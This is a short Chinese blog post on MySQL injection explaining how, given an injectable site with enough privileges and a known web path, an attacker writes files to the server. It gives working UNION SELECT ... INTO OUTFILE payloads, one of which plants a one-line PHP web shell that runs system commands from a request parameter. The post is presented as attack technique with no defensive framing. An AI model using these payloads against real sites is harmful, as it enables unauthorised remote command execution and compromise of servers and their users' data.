美文网首页
Mysql数据库注入

Mysql数据库注入

作者: 傻傻笨笨宝宝 | 来源:发表于2017-09-26 21:39 被阅读66次

    1、如果发现一个网站存在注入,而且权限够大。那么,可以通过写一句话木马到服务器上去,但是你必须知道web应用程序在服务器上的路径。

    通过INTO OUTFILE写文件

    union select ‘TEXT INTO FILE’,2,3 INTO OUTFILE ‘/tmp/blah.txt’

    #字符串‘TEXT INTO FILE’将会被存储在目录/tmp下的blah.txt中。

    union select “<?system($_REQUEST['cmd']); ?>”,2,3 INTO OUTFILE ‘/var/www/test/execcmd.php’

    #直接将一句话写入到.php文件中去。

    相关文章

      网友评论

          本文标题:Mysql数据库注入

          本文链接:https://www.haomeiwen.com/subject/ldhmfxtx.html